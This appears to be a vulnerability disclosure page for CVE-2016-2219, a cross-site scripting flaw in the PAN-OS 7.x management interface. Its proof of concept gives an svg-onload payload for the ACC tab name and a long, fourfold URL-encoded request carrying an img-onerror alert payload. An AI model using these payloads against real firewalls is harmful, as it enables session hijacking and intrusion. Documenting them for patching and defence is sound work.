CPR-Zero: CVE-2016-2219

Information

Cross-site scripting (XSS) vulnerability in the management interface in Palo Alto Networks PAN-OS 7.x before 7.0.8 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.

Crash Dump

None

PoC

the vulnerability located in the ACC tab [ the second tab in the pannel ]

1) press on the ACC Tab
2) press on the add button and in the Tab name write: <svg/onload=alert(“xss”)>

or press on any crafter request like this:

id=1&user=user&session=session&data=%5B%7B%22name%22%3A%22ACC_STATE_ID%22%2C%22value%22%3A%22o%253AstateArr%253Da%25253Ao%2525253AviewName%2525253Ds%252525253ANetwork%2525252520Activity%2525255EviewConfig%2525253Da%252525253Aa%25252525253Aa%2525252525253Ao%252525252525253AxtypeConfig%252525252525253Ds%25252525252525253AACC_Application_Usage%25252525255Ea%2525252525253Ao%252525252525253AxtypeConfig%252525252525253Ds%25252525252525253AACC_User_Activity%252525255Ea%25252525253Aa%2525252525253Ao%252525252525253AxtypeConfig%252525252525253Ds%25252525252525253AACC_Sources%25252525255Ea%2525252525253Ao%252525252525253AxtypeConfig%252525252525253Ds%25252525252525253AACC_Destinations%252525255Ea%25252525253Aa%2525252525253Ao%252525252525253AxtypeConfig%252525252525253Ds%25252525252525253AACC_Source_Regions%25252525255Ea%2525252525253Ao%252525252525253AxtypeConfig%252525252525253Ds%25252525252525253AACC_Dest_Regions%252525255Ea%25252525253Aa%2525252525253Ao%252525252525253AxtypeConfig%252525252525253Ds%25252525252525253AACC_Host_Information%25252525255Ea%2525252525253Ao%252525252525253AxtypeConfig%252525252525253Ds%25252525252525253AACC_Rule_Usage%25255Eo%2525253AviewName%2525253Ds%252525253AThreat%2525252520Activity%2525255EviewConfig%2525253Da%252525253Aa%25252525253Aa%2525252525253Ao%252525252525253AxtypeConfig%252525252525253Ds%25252525252525253AACC_Threat_Activity%252525255Ea%25252525253Aa%2525252525253Ao%252525252525253AxtypeConfig%252525252525253Ds%25252525252525253AACC_WildFire_Activity_By_FileType%25252525255Ea%2525252525253Ao%252525252525253AxtypeConfig%252525252525253Ds%25252525252525253AACC_WildFire_Activity_By_Application%252525255Ea%25252525253Aa%2525252525253Ao%252525252525253AxtypeConfig%252525252525253Ds%25252525252525253AACC_Hosts_Visiting_Malware_URLs%25252525255Ea%2525252525253Ao%252525252525253AxtypeConfig%252525252525253Ds%25252525252525253AACC_Hosts_Matching_CC_DNS_Sigs%252525255Ea%25252525253Aa%2525252525253Ao%252525252525253AxtypeConfig%252525252525253Ds%25252525252525253AACC_Apps_Using_NonStandard_Ports%25252525255Ea%2525252525253Ao%252525252525253AxtypeConfig%252525252525253Ds%25252525252525253AACC_Rules_Allowing_Apps_On_NonStandard_Ports%25255Eo%2525253AviewName%2525253Ds%252525253ABlocked%2525252520Activity%2525255EviewConfig%2525253Da%252525253Aa%25252525253Aa%2525252525253Ao%252525252525253AxtypeConfig%252525252525253Ds%25252525252525253AACC_Blocked_Apps%25252525255Ea%2525252525253Ao%252525252525253AxtypeConfig%252525252525253Ds%25252525252525253AACC_Blocked_User_Activity%252525255Ea%25252525253Aa%2525252525253Ao%252525252525253AxtypeConfig%252525252525253Ds%25252525252525253AACC_Blocked_Threats%25252525255Ea%2525252525253Ao%252525252525253AxtypeConfig%252525252525253Ds%25252525252525253AACC_Blocked_Content%252525255Ea%25252525253Aa%2525252525253Ao%252525252525253AxtypeConfig%252525252525253Ds%25252525252525253AACC_Deny_Rule_Activity%25255Eo%2525253AviewName%2525253Ds%252525253A%252525253Cimg%2525252520src%252525253Da%2525252520onerror%252525253Dalert%2525252528%2525252522XSS%2525252522%2525252529%252525253E%2525255EviewConfig%2525253Da%252525253A%22%7D%5D

note the XSS string here 	       ^

just one rule, keep the 4 time url encoding for the payload. like this %2525252522 is actually equal this quotation marks (“)
the attack vector very simple and straightforward.

References:
https://securityadvisories.paloaltonetworks.com/Home/Detail/42

Share this: